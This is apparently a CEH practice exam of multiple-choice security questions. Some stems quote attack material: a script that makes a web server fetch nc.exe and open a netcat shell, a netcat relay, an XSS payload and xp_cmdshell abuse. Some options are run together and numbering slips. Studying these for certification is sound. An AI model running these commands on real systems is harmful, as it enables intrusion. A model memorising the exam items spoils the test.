CEH EXAM FINAL 2

1- An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last
test did not contain management or control packets in the submitted traces. Which of the following is the
most likely reason for lack of management or control packets?
The wireless card was not turned on.
The wrong network card drivers were in use by Wireshark.
On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode.
Certain operating systems and adapters do not collect the management or control packets.

2- CloudSign, a digital certificate authority, recently adopted cloud technology to meet the growing
business demand. Within a week of moving to the cloud, CloudSign was targeted with a massive denial-of-
service attack. When CloudSign contacted its cloud service provider, they are not responsible for the attack
on the company based on the existing SLA between the two parties. Which of the following cloud threats is
referred to in the above scenario?
Abuse of cloud services
Malicious insiders
Insufficient due diligence
Account hijacking

3-A corporation hired an ethical hacker to test if it is possible to obtain users’ login credentials using methods
other than social engineering. Access to offices and to a network node is granted to the hacker. Results from
server scanning indicate that all are adequately patched andphysical access is denied; thus, administrators
have access only through Remote Desktop. Which techniquecould be used to obtain login credentials?
Capture every users' traffic with Ettercap.
Capture LANMAN Hashes and crack them with LC6.
Guess passwords using Medusa or Hydra against a network service.
Capture administrators RDP traffic and decode it with Cain and Abel.

4-An attacker has captured a target file that is encrypted with public key cryptography. Which of the attacks
below is likely to be used to crack the target file?
Timing attack
Replay attack
Memory trade-off attack
Chosen plain-text attack
5- Which of the following is a symmetric cryptographic standard?
DSA
PKI
RSA
3DES

6- Which of the following describes a component of Public Key Infrastructure (PKI) where a copy of a private
key is stored to provide third-party access and to facilitate recovery operations?
Key registry
Recovery agent
Directory
Key escrow

7- Which of the following is a common Service Oriented Architecture (SOA) vulnerability?

Cross-site scripting
SQL injection
VPath injection
XML denial of service issues

8- What is the best defense against privilege escalation vulnerability?

Patch systems regularly and upgrade interactive login privileges at the system administrator level.
Run administrator and applications on least privileges and use a content registry for tracking.
Run services with least privileged accounts and implement multi-factor authentication and authorization.
Review user roles and administrator privileges for maximum utilization of automation services.

9- A company has publicly hosted web applications and an internal Intranet protected by a firewall. Which
technique will help protect against enumeration?
Reject all invalid email received via SMTP.
Allow full DNS zone transfers.
Remove A records for internal hosts.
Enable null session pipes
10- Which initial procedure should an ethical hacker perform after being brought into an organization?

Begin security testing

Turn over deliverable.
Sign a formal contract with non-disclosure.
Assess what the organization is trying to protect.

11- Xsecurity Services wants to roll out its innovative cloud services for SMEs. The company wants to
provide its cloud service with the following characteristics.
Infrastructure should have dedicated resources for the client
Infrastructure should store data on exclusive machine
Infrastructure should completely control the cloud server
Infrastructure should have the capability to manage increased resources depending upon the requirement
and the usage of client
It should provide security by employing custom firewalls

Which of the following cloud deployment models fulfil the requirements above?
Community Cloud
Hybrid Cloud
Public Cloud
Private Cloud

12- Which of the following processes evaluates the adherence of an organization to its stated security policy?
Vulnerability assessment.
Penetration testing.
Risk assessment.
Security auditing.

13- How can telnet be used to fingerprint a web server?

telnet webserverAddress 80 HEAD / HTTP/1.0

telnet webserverAddress 80 PUT / HTTP/1.0

telnet webserverAddress 80 HEAD / HTTP/2.0
telnet webserverAddress 80 PUT / HTTP/2.0

14- ICMP ping and ping sweeps are used to check for active systems and to check
if ICMP ping traverses a firewall. the route that the ICMP

ping took. the location of the switchport in relation to the

ICMP ping. the number of hops an ICMP ping takes to reach a
destination.

15- A consultant is hired to do physical penetration testing at a large financial company.On the first day of
his assessment, the consultant goes to the company`s building dressed like an electrician and waits in
the lobby for an employee to pass through the main access gate, then the consultant follows the
employee behind to get into the restricted area. Which type of attack did the consultant perform?
Man trap.
Tailgating.
Shoulder surfing.
Social engineering.

16- Which of the following tools would be the best choice for achieving compliance with PCI Requirement
11?
Truecrypt
Sub7
Nessus
Clamwin

17- A security consultant decides to use multiple layers of antivirus defense, such as end user desktop
antivirus and e-mail gateway. This approach can be used to mitigate which attack?
Forensic attack
ARP spoofing attack
Social engineering attack
Scanning attack
18- How can a rootkit bypass Windows 7 operating system’s kernel mode, and code signing policy?
Defeating the scanner from detecting any code change at the kernel
Replacing patch system calls with its own version that hides the rootkit (attacker's) actions
Performing common services for the application process and replacing real applications with fake ones
Attaching itself to the master boot record in a hard drive and changing the machine's boot

19- Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will
decode a packet capture and extract the voice conversations?
Cain and Abel
John the Ripper
Nikto
Hping

20- A link pops up on a shopping site asking you to click on it. As soon as the link is clicked, you are asked to
share the link on Facebook. A Facebook login screen appears and you log in to your account. Once the
credentials are passed the Facebook is hacked. This is an example of what type of mobile attack? Session
Hijacking
Clickjacking attack
Cross-site Scripting (XSS)
SQL injection attacks

21- In keeping with the best practices of layered security, where are the best places to place intrusion
detection/intrusion prevention systems? (Choose two.)
HID/HIP (Host-based Intrusion Detection/Host-based Intrusion Prevention)
NID/NIP (Node-based Intrusion Detection/Node-based Intrusion Prevention)
NID/NIP (Network-based Intrusion Detection/Network-based Intrusion Prevention)
CID/CIP (Computer-based Intrusion Detection/Computer-based Intrusion Prevention)

22- A penetration tester is hired to do a risk assessment of a company's DMZ. The rules of engagement state
that the penetration test has to be done from an external IP address with no prior knowledge of the internal
IT systems. What kind of test is being performed?
White box
Grey box
Red box
Black box

23- Which type of access control is used on a router or firewall to limit network activity?
Mandatory.
Discretionary.
Rule-based.
Role-based.

24- The following is a sample of output from a penetration tester's machine targeting a machine with the IP
address of 192.168.1.106:
[ATTEMPT] target 192.168.1.106 - login "root" - pass "a" 1 of 20
[ATTEMPT] target 192.168.1.106 - login "root" - pass "123" 2 of 20
[ATTEMPT] target 192.168.1.106 - login "testuser" - pass "a" 3 of 20
[ATTEMPT] target 192.168.1.106 - login "testuser" - pass "123" 4 of 20
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "a" 5 of 20
[ATTEMPT] target 192.168.1.106 - login "admin" - pass "123" 6 of 20
[ATTEMPT] target 192.168.1.106 - login "" - pass "a" 7 of 20
[ATTEMPT] target 192.168.1.106 - login "" - pass "123" 8 of 20

What is most likely taking place?

Ping sweep of the 192.168.1.106 network
Remote service brute force attempt
Port scan of 192.168.1.106
Denial of service attack on 192.168.1.106

25- On a Linux device, which of the following commands will start the Nessus client in the background so
that the Nessus server can be configured?
nessus +
nessus *s
nessus &
nessus -d

26- During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials.
The tester assumes that the service is running with a Local System account. How can this weakness be
exploited to access the system?
Using the Metasploit psexec module setting the SA / Admin credential
Invoking the stored procedure xp_shell to spawn a Windows command shell
Invoking the stored procedure cmd_shell to spawn a Windows command shell
Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

27- John, an ethical hacker, is demonstrating a proof-of-concept IoT attack. For this demonstration, he used
a jammer to jam and sniff the code sent by the car remote of a victim to unlock his car. Due to the jamming,
the vehicle did not open; so the victim sent a code again to unlock his car. John sniffed the second code as
well. After sniffing and capturing the second code, he forwarded the first code to the car which opened it.
John can use the second code in future to unlock the car. What kind of attack did John demonstrate?
Rolling Code Attack
Side Channel Attack
BlueBorne Attack
Sybil Attack

28- When an alert rule is matched in a network-based IDS like snort, the IDS does which of the following:
Drops the packet and moves on to the next one
Continues to evaluate the packet until all rules are checked
Stops checking rules, sends an alert, and lets the packet continue
Blocks the connection with the source IP address in the packet

29- A tester is attempting to capture and analyze the traffic on a given network and realizes that the network
has several switches. What could be used to successfully sniff the traffic on this switched network? (Choose
three.)
Address Resolution Protocol (ARP) spoofing
MAC duplication
MAC flooding SYN flooding
Reverse smurf attack
ARP broadcasting

30-While performing data validation of web content, a security technician is required to restrict malicious
input. Which of the following processes is an efficient way of restricting malicious input?
Validate web content input for query strings.
Validate web content input with scanning tools.
Validate web content input for type, length, and range.
Validate web content input for extraneous queries.

31- To send a PGP encrypted message, which piece of information from the recipient must the sender have
before encrypting the message?
Recipient's private key
Recipient's public key
Master encryption key
Sender's public key

32- A circuit level gateway works at which of the following layers of the OSI Model?
Layer 5 - Application
Layer 4 – TCP
Layer 3 – Internet protocol
Layer 2 – Data link

33- The intrusion detection system at a software development company suddenly generates multiple alerts
regarding attacks against the company's external webserver, VPN concentrator, and DNS servers. What
should the security team do to determine which alerts to check first?
Investigate based on the maintenance schedule of the affected systems.
Investigate based on the service level agreements of the systems.
Investigate based on the potential effect of the incident.
Investigate based on the order that the alerts arrived in.

34- One advantage of an application-level firewall is the ability to

Filter packets at the network level.
Filter specific commands, such as http:post.
Retain state information for each packet.
Monitor TCP handshaking.

35- The Open Web Application Security Project (OWASP) testing methodology addresses the need to secure
web applications by providing which one of the following services
An extensible security framework named COBIT.
A list of flaws and how to fix them.
Web application patches.
A security certification for hardened web applications.

36- If a tester is attempting to ping a target that exists but receives no response or a response that states the
destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option
could the tester use to get a response from a host using TCP?
Hping
Traceroute
TCP ping
Broadcast ping

37- During the session hijacking penetration testing on the organization network, organization came to know
that the network is vulnerable to session hijacking as they are using Telnet and rlogin protocol for logon,
authentication, or data transmission.
Which of the following preventive measure organization needs to implement to protect the organization
network from session hijacking attack?
Use OpenSSH or SSH (Secure Shell)
Enable compression mechanism of HTTP requests
Increase the life span of a session or a cookie
Use PAP (Password Authentication Protocol) for authentication

38- What type of OS fingerprinting technique sends specially crafted packets to the remote OS and analyzes
the received response?
Passive
Reflective
Active
Distributive

39- What is the name of the international standard that establishes a baseline level of confidence in the
security functionality of IT products by providing a set of requirements for evaluation? Blue Book
ISO 26029
Common Criteria
The Wassenaar Agreement

40- When creating a security program, which approach would be used if senior management is supporting
and enforcing the security policy?
A bottom-up approach.
A top-down approach.
A senior creation approach.
An IT assurance approach.

41- Which of the following processes of PKI (Public Key Infrastructure) ensures that a trust relationship exists
and that a certificate is still valid for specific operations?
Certificate issuance
Certificate validation
Certificate cryptography
Certificate revocation

42- Low humidity in a data center can cause which of the following problems?
Heat.
Corrosion.
Static electricity.
Airborne contamination.

43- What is the primary drawback of using Advanced Encryption Standard (AES) algorithm with a 256 bit key
to share sensitive data?
Due to the key size, the time it will take to encrypt and decrypt the message hinders efficient communication.
To get messaging programs to function with this algorithm requires complex configurations.
It has been proven to be a weak cipher; therefore, should not be trusted to protect sensitive data.
It is a symmetric key algorithm, meaning each recipient must receive the key through a different channel
than the message.

44- Jailbreaking provides root access to the operating system and permits downloading of third-party
applications, themes, extensions on iOS devices. Which of the following Jailbreaking allows user-level
access but not allow iboot-level access?
iBoot Exploit
Userland Exploit
Bootrom Exploit
Cydia Exploit

45- Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common?
They are written in Java.
They send alerts to security monitors.
They use the same packet analysis engine.
They use the same packet capture utility.

46- A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of emails.
The integrity of the encrypted email is dependent on the security of which of the following?
Public key
Private key
Modulus length
Email server certificate

47- James works as a cloud security professional with XSecurity Consultant. He is performing a security
assessment on a small healthcare provider’s cloud network. James started penetration testing by
searching for virtual machines on the client host network to identify all the machines, appliances, and
services running in the virtual environment. What will help James discover all the virtual machines on
the client’s network?
Use the ping utility to discover the virtual environments
Use the Nmap tool to detect virtual machines
Check IP address information on virtual NICs
Use the Google search engine to discover the virtual environments

48- An IT security engineer notices that the company’s web server is currently being hacked. What should
the engineer do next?
Unplug the network connection on the company’s web server.
Determine the origin of the attack and launch a counterattack
Record as much information as possible from the attack.
Perform a system restart on the company’s web server.

49- A pentester is using Metasploit to exploit an FTP server and pivot to a LAN. How will the pentester
pivot use Metasploit?
Issue the pivot exploit and set the meterpreter.
Reconfigure the network settings in the meterpreter.
Set the payload to propagate through the meterpreter.
Create a route statement in the meterpreter.

50- Which of the following ensures that updates to policies, procedures, and configurations are made in
a controlled and documented fashion?
Regulatory compliance
Peer review
Change management
Penetration testing

51- An attacker sniffs encrypted traffic from the network and is subsequently able to decrypt it. Which
cryptanalytic technique can the attacker use now in his attempt to discover the encryption key?
Birthday attack
Known plaintext attack
Meet in the middle attack
Chosen ciphertext attack

52- Which of the following examples best represents a logical or technical control?
Security tokens
Heating and air conditioning
Smoke and fire alarms
Corporate security policy

53- How can rainbow tables be defeated?

Password salting
Use of non-dictionary words
All uppercase character passwords
Lockout accounts under brute force password cracking attempts

54- When does the Payment Card Industry Data Security Standard (PCI-DSS) require organizations
to perform external and internal penetration testing?
At least once a year and after any significant upgrade or modification.
At least once every three years or after any significant upgrade or modification.
At least twice a year or after any significant upgrade or modification.
At least once every two years and after any significant upgrade or modification.

55- Which of the following is an application that requires a host application for replication?
Micro
Worm
Trojan
Virus

56- Which of the following is a component of a risk assessment?

Physical security.
Administrative safeguards.
DMZ.
Logical interface.

57- Which of the following markup languages enables SSO delegation and risk-based authentication in the
cloud environment specifically preventing phishing and MitM attacks?
Security Assertion Markup Language (SAML) Service
Provisioning Markup Language (SPML) eXensible Access
Control Markup Language (XACML)
Open Authentication (OAuth)

58- The fundamental difference between symmetric and asymmetric key cryptographic systems is that
symmetric key cryptography uses__________________?
Multiple keys for non-repudiation of bulk data
Different keys on both ends of the transport medium
Bulk encryption for data transmission over fiber
The same key on each end of the transmission medium

59- Danish, has recently completed a professional cloud training sponsored by his organization and wants to
implement cloud technologies in his organization. Danish is new to the cloud technology and before
launching the company’s cloud services; he decided to create test machines and configurations where he
can test the performance of cloud services. Due to the lack of a cloud/virtualization policy, Danish mistakenly
created several machines he was unable to monitor. Which of the following term defines the above
situation?
CloudCracker
Cloud sprawl
Malicious insider
Abuse of cloud services

59-- A penetration tester is attempting to scan an internal corporate network from the Internet without
alerting the border sensor. Which of the following techniques should the tester consider using?
Spoofing an IP address
Tunneling scan over SSH
Tunneling over high port numbers
Scanning using fragmented IP packets

61- Which system consists of a publicly available set of databases that contain domain name registration
contact information?
WHOIS
IANA
CAPTCHA
IETF

62- One way to defeat a multi-level security solution is to leak data via
A bypass regulator Steganography.
A covert channel
Asymmetric routing

63- Your company has recently received several complaints where cloud service users reported suspicious
activities in their account. The network security team in your company suspects the accounts were victims
of session hijacking attacks. Which of the following network layer security controls will prevent attacks such
as session hijacking?
DNSSEC
DLP
IAM
HIDS

64- Which of the following network attacks takes advantage of weaknesses in the fragment reassembly
functionality of the transmission control protocol (TCP) or Internet protocol (IP)stack?
Teardrop attack
SYN flood attack
Smurf attack
Ping of death attack

65- What is the outcome of the command "nc -l -p 2222 | nc 10.1.0.43 1234"?
Netcat will listen on the 10.1.0.43 interface for 1234 seconds on port 2222.
Netcat will listen on port 2222 and output anything received to a remote connection on 10.1.0.43 port
1234.
Netcat will listen for a connection from 10.1.0.43 on port 1234 and output anything received to port 2222.
Netcat will listen on port 2222 and then output anything received to local interface 10.1.0.43.

66- A company firewall engineer has configured a new DMZ to allow public systems to be located away from
the internal network. The engineer has three security zones set:
 Untrust (Internet) – (Remote network = 217.77.88.0/24)
DMZ (DMZ) – (11.12.13.0/24)
Trust (Intranet) – (192.168.0.0/24)
The engineer wants to configure remote desktop access from a fixed IP on the remote network to a remote
desktop server in the DMZ. Which rule would best fit this requirement?
Permit 217.77.88.0/24 11.12.13.0/24 RDP 3389
Permit 217.77.88.12 11.12.13.50 RDP 3389
Permit 217.77.88.12 11.12.13.0/24 RDP 3389
Permit 217.77.88.0/24 11.12.13.50 RDP 3389

67- A person approaches a network administrator and wants advice on how to send encrypted email from
home. The end user does not want to have to pay for any license fees or manage server services. Which of
the following is the most secure encryption protocol that the network administrator should recommend?
IP Security (IPSEC)
Multipurpose Internet Mail Extensions (MIME)
Pretty Good Privacy (PGP)
Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)

68- A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would
the hacker use?
-sO
-sP
-sS
-sU

69- When utilizing technical assessment methods to assess the security posture of a network, which of the
following techniques would be most effective in determining whether end-user security training would be
beneficial?
Vulnerability scanning
Social engineering
Application security testing
Network sniffing
70- James wants to prevent reflective DoS attacks from being able to compromise your network.What steps
can Stan take to prevent these attacks?
James will need to block all TCP port 17185 traffic on the firewall
James should configure his network devices to recognize SYN source IP addresses that never complete their
connections
James needs to block all UDP traffic coming in on port 1001 to prevent future reflective DoS attacks against
their network
James should configure his firewall so that it blocks FIN packets that are sent to the broadcast address of the
company’s internal IP range

71- Which of the following are variants of mandatory access control (MAC) mechanisms? (Choose two.)
Two factor authentication
Acceptable use policy
Username / password
User education program
Sign in register

72- A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the
nslookup interactive mode for the search. Which command should the hacker type into the command shell
to request the appropriate records?
Locate type=ns
Request type=ns
Set type=ns
Transfer type=ns

73- A security engineer has been asked to deploy a secure remote access solution that will allow employees
to connect to the company’s internal network. Which of the following can be implemented to minimize the
opportunity for the man-in-the-middle attack to occur?
SSL
Mutual authentication
IPSec
Static IP addresses
74- An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and
risk assessments. A friend recently started a company and asks the hacker to perform a penetration
test and vulnerability assessment of the new company as a favor. What should the hacker's next step
be before starting work on this job?
Start by footprinting the network and mapping out a plan of attack.
Ask the employer for authorization to perform the work outside the company.
Begin the reconnaissance phase with passive information gathering and then move into active information
gathering.
Use social engineering techniques on the friend's employees to help identify areas that may be susceptible
to attack.

75- What is the main difference between a “Normal” SQL Injection and a “Blind” SQL Injection
vulnerability?
The request to the web server is not visible to the administrator of the vulnerable application.
The attack is called “Blind” because, although the application properly filters user input, it is still vulnerable
to code injection.
A successful attack does not show an error message to the administrator of the affected application.
The vulnerable application does not display errors with information about the injection results to the
attacker.

76- An engineer is learning to write exploits in Cand is using the Kali Linux. The engineer wants to compile
the newest Cexploit and name it calc.exe. Which command would the engineer use to accomplish this?
ghackersExploit.cpp -o calc.exe
ghackersExploit.py -o calc.exe g-i
hackersExploit.pl -o calc.exe g--compile –i
hackersExploit.cpp -o calc.exe

77- A penetration tester was hired to perform a penetration test for a bank. The tester began searching
for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news articles online
about the bank, watching the bank employees time in and out, searching the bank's job postings (paying
special attention to IT related jobs), and visiting the local dumpster for the bank's corporate office. What
phase of the penetration test is the tester currently in?
Information reporting
Vulnerability assessment
Active information gathering
Passive information gathering

78- A computer science student needs to fill some information into a secured Adobe PDF job application that
was received from a prospective employer. Instead of requesting a new document that allowed the forms
to be completed, the student decides to write a script that pulls passwords from a list of commonly used
passwords, to try against the secured PDF until the correct password is found or the list is exhausted. Identify
the type of password attack.
Man-in-the-middle attack
Brute-force attack
Dictionary attack
Session hijacking

79- During a wireless penetration test, a tester detects an access point using the WPA2 encryption. Which
of the following attacks should be used to obtain the key?
The tester must capture the WPA2 authentication handshake and then crack it.
The tester must use the tool inSSIDer to crack it using the ESSID of the network.
The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard.
The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain
the key.

80- Which of the following resources does NMAP need to be used as a basic vulnerability scanner
covering several vectors like SMB, HTTP and FTP?
Metasploit scripting engine
Nessus scripting engine
NMAP scripting engine
SAINT scripting engine

81- A security analyst is performing an audit on the network to determine if there are any deviations from
the security policies in place. The analyst discovers that a user from the IT department had a dial-out modem
installed. Which security policy must the security analyst check to see if dial-out modems are allowed?
Firewall-management policy
Acceptable-use policy
Remote-access policy
Permissive policy
82- When setting up a wireless network, an administrator enters a pre-shared key for security. Which of
the following is true?
The key entered is a symmetric key used to encrypt the wireless data.
The key entered is a hash that is used to prove the integrity of the wireless data.
The key entered is based on the Diffie-Hellman method.
The key is an RSA key used to encrypt the wireless data.

83- Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the
following choices would be a common vulnerability that usually exposes them?
Cross-site scripting
SQL injection
Missing patches
CRLF injection

84-Which United States legislation mandates that the Chief Executive Officer (CEO) and the Chief Financial
Officer (CFO) must sign statements verifying the completeness and accuracy of financial reports?
Sarbanes-Oxley Act (SOX).
Gramm-Leach-Bliley Act (GLBA).
Fair and Accurate Credit Transactions Act (FACTA).
Federal Information Security Management Act (FISMA).

85- A recently hired network security associate at a local bank was given the responsibility to perform daily
scans of the internal network to look for unauthorized devices. The employee decides to write a script that
will scan the network for unauthorized devices every morning at 5:00 am. Which of the following
programming languages would most likely be used?
PHP
C#
Python
ASP.NET
86-While checking the settings on the internet browser, a technician finds that the proxy server settings have
been checked and a computer is trying to use itself as a proxy server. What specific octet within the subnet
does the technician see?
10.10.10.10
127.0.0.1
192.168.1.1
192.168.168.168

87- Which tool is used to automate SQL injections and exploit a database by forcing a given web application
to connect to another database controlled by a hacker?
DataThief
NetCat
Cain and Abel
SQL Injector

88-Stored biometric is vulnerable to an attack. What is the main reason behind this?
The digital representation of the biometric might not be unique, even if the physical characteristic is unique.
Authentication using a stored biometric compares a copy to a copy instead of the original to a copy.
A stored biometric is no longer “something you are” and instead becomes “something you have.”
A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the
biometric.

89- When analyzing the IDS logs, the system administrator notices connections from outside of the LAN have
been sending packets where the Source IP address and Destination IP address are the same. But no alerts
have been sent via email or logged in the IDS. Which type of an alert is this?
False positive
False negative
True positive
True negative

90- Which of the following items of a computer system will an anti-virus program scan for viruses?
Boot Sector
Deleted Files
Windows Process List
Password Protected Files

91-Which of the following is a detective control?

Smart card authentication.
Security policy.
Audit trail.
Continuity of operations plan.

92- Which of the following scanning tools is specifically designed to find potential exploits in Microsoft
Windows products?
Microsoft Security Baseline Analyzer
Retina
Core Impact
Microsoft Baseline Security Analyzer

93- Which of the following descriptions is true about a static NAT?

A static NAT uses a many-to-many mapping.
A static NAT uses a one-to-many mapping.
A static NAT uses a many-to-one mapping.
A static NAT uses a one-to-one mapping.

94- Which property ensures that a hash function will not produce the same hashed value for two different
messages?
Collision resistance
Bit length
Key strength
Entropy

95- A company has made the decision to host their own email and basic web services. The administrator
needs to set up the external firewall to limit what protocols should be allowed to get to the public part
of the company's network. Which ports should the administrator open? (Choose three.)
Port 22
Port 23
Port 25
Port 53
Port 80
Port 139
Port 445

96- Michael, the penetration tester from a pen test firm, performs a penetration testing on the client system.
Client wants to find and identify the OS running on a particular host computer and tests it for known
deficiencies. Which of the following tools Michael will use to perform the penetration testing?
Application-layer vulnerability assessment tools
Host-based vulnerability assessment tools
Scope assessment tools
Depth assessment tools

97- From the two screenshots below, which of the following is occurring?
10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.
10.0.0.253 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
10.0.0.2 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.
10.0.0.252 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.

98- Which type of scan is used on the eye to measure the layer of blood vessels?
Facial recognition scan
Retinal scan
Iris scan
Signature kinetics scan

99- Which NMAP command combination would let a tester scan every TCP port from a class C network
that is blocking ICMP with fingerprinting and service detection?
NMAP -PN -A -O -sS 192.168.2.0/24
NMAP -P0 -A -O -p1-65535 192.168.0/24
NMAP -P0 -A -sT -p0-65535 192.168.0/16
NMAP -PN -O -sS -p 1-1024 192.168.0/8

100- A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4
web server. While it is effective, the tester finds it tedious to perform extended functions. On further
research, the tester come across a perl script that runs the following msadc functions:
system("perl msadc.pl -h $host -C \"echo open $your >testfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>testfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>testfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>testfile\""); system("perl
msadc.pl -h $host -C \"echo get nc.exe>>testfile\""); system("perl
msadc.pl -h $host -C \"echo get hacked.html>>testfile\"");
("perl msadc.pl -h $host -C \"echo quit>>testfile\""); system("perl

msadc.pl -h $host -C \"ftp \-s\:testfile\"");

$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");

Which exploit is indicated by this script?

A buffer overflow exploit
A chained exploit
A SQL injection exploit
A denial of service exploit

101- ****- Select Question - select

Which of the following lists are valid data-gathering activities associated with a risk assessment?
Threat identification, vulnerability identification, control analysis
Threat identification, response identification, mitigation identification
Attack profile, defence profile, loss profile
System profile, vulnerability identification, security determination

102- Which of the following approaches to vulnerability assessment is mainly focused on the hierarchical
interdependent vulnerabilities, such as server-based vulnerabilities or device-based vulnerabilities?
Product-based assessment solutions
Service-based assessment solution
Tree-based assessment
Inference-based assessment

103- A tester has been hired to do a web application security test. The tester notices that the site is dynamic
and must make use of a back end database. In order for the tester to see if an SQL injection is possible,
what is the first character that the tester should use to attempt breaking a valid SQL request?
Semicolon
Single quote
Exclamation mark
Double quote

104- An NMAP scan of a server shows port 25 is open. What risk could this pose?
Open printer sharing
Web portal data leak
Clear text authentication
Active mail relay

105- Which type of antenna is used in wireless communication?

Omnidirectional
Parabolic
Uni-directional
Bi-directional

106- Passive reconnaissance involves collecting information through which of the following?
Social engineering
Network traffic sniffing
Man in the middle attacks
Publicly accessible sources
107- While testing web applications, you attempt to insert the following test script into the search area on
the company’s web site:
<script>alert(‘Testing Testing Testing’)</script>
Afterwards, when you press the search button, a pop up box appears on your screen with the text,
“Testing Testing Testing.”. What vulnerability is detected in the web application here?
A buffer overflow
Password attacks
Cross Site Scripting
A hybrid attack

108- OnCloud, a UK-based cloud service provider hired Anthony, a cloud security professional. Anthony was
asked to select cloud formations for secure collaboration. Anthony decides on the Jericho Cloud Cube
Model for the organization.
Which dimension defines the physical location of data in the Jericho Model?
Internal (I) / External (E)
Proprietary (P) / Open (O)
Perimeterised (Per) / De-perimeterised (D-p) Architectures
Insourced / Outsourced

109- Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server must
have in order to properly function?
Fast processor to help with network traffic analysis
They must be dual-homed
Similar RAM requirements
Fast network interface cards

110- A company has five different subnets: 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and
192.168.5.0. How can NMAP be used to scan these adjacent Class C networks?
NMAP -P 192.168.1-5.
NMAP -P 192.168.0.0/16
NMAP -P 192.168.1.0,2.0,3.0,4.0,5.0
NMAP -P 192.168.1/17
111- A hacker searches in Google for filetype:pcf to find Cisco VPN config files. Those files may contain
connectivity passwords that can be decoded with which of the following?
Cupp
Nessus
Cain and Abel
John The Ripper Pro

112- Employees in a company are no longer able to access Internet web sites on their computers. The
network administrator is able to successfully ping IP address of web servers on the Internet and open
the web sites by using an IP address instead of the URL. The administrator runs the Nslookup command
for www.eccouncil.org and receives an error message stating there is no response from the server.
What should the administrator do next?
Configure the firewall to allow traffic on TCP ports 53 and UDP port 53.
Configure the firewall to allow traffic on TCP ports 80 and UDP port 443.
Configure the firewall to allow traffic on TCP port 53.
Configure the firewall to allow traffic on TCP port 8080.

113- Advanced Encryption Standard is an algorithm used for which of the following?
Data integrity
Key discovery
Bulk data encryption
Key recovery

114- Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them?
Detective
Passive
Intuitive
Reactive

115- Which of the following are valid types of rootkits? (Choose three.)
Hypervisor level
Network level
Kernel level
Application level
Physical level
Data access level

116- Which of the following tools will scan a network to perform vulnerability checks and compliance
auditing?
NMAP
Metasploit
Nessus
BeEF

117- While conducting a penetration test, the tester determines that there is a firewall between the tester's
machine and the target machine. The firewall is only monitoring TCP handshaking of packets at the
session layer of the OSI model. Which type of firewall is the tester trying to traverse?
Packet filtering firewall
Application-level firewall
Circuit-level gateway firewall
Stateful multilayer inspection firewall

118- A large company intends to use Blackberry for corporate mobile phones and a security analyst is
assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to
demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate
network. What tool should the analyst use to perform a Blackjacking attack?
Paros Proxy
BBProxy
BBCrack
Blooover

119- Which of the following techniques will identify if computer files have been changed?
Network sniffing
Permission sets
Integrity checking hashes
Firewall alerts
120- Which of the following is a client-server tool utilized to evade firewall inspection?

TCP-over-dns

kismet
nikto

hping

121- At a Windows Server command prompt, which command could be used to list the running services?
Sc query type= running
Sc query \\servername
Sc query
Sc config

122- How do employers protect assets with security policies pertaining to employee surveillance activities?
Employers promote monitoring activities of employees as long as the employees demonstrate
trustworthiness.
Employers use informal verbal communication channels to explain employee monitoring activities to
employees.
Employers use network surveillance to monitor employee email traffic, network access, and to record
employee keystrokes.
Employers provide employees with written statements that clearly discuss the boundaries of monitoring
activities and the consequences.

123- Which of the following conditions must be given to allow a tester to exploit a Cross-Site Request Forgery
(CSRF) vulnerable web application?
The victim user must open a malicious link with an Internet Explorer prior to version 8.
The session cookies generated by the application do not have the HttpOnly flag set.
The victim user must open a malicious link with a Firefox prior to version 3.
The web application should not use random tokens.

124-Which set of access control solutions implements two-factor authentication?

USB token and PIN
Fingerprint scanner and retina scanner
Password and PIN
Account and password

125- To reduce the attack surface of a system, administrators should perform which of the following
processes to remove unnecessary software, services, and insecure configuration settings?

Harvesting
Windowing
Hardening
Stealthing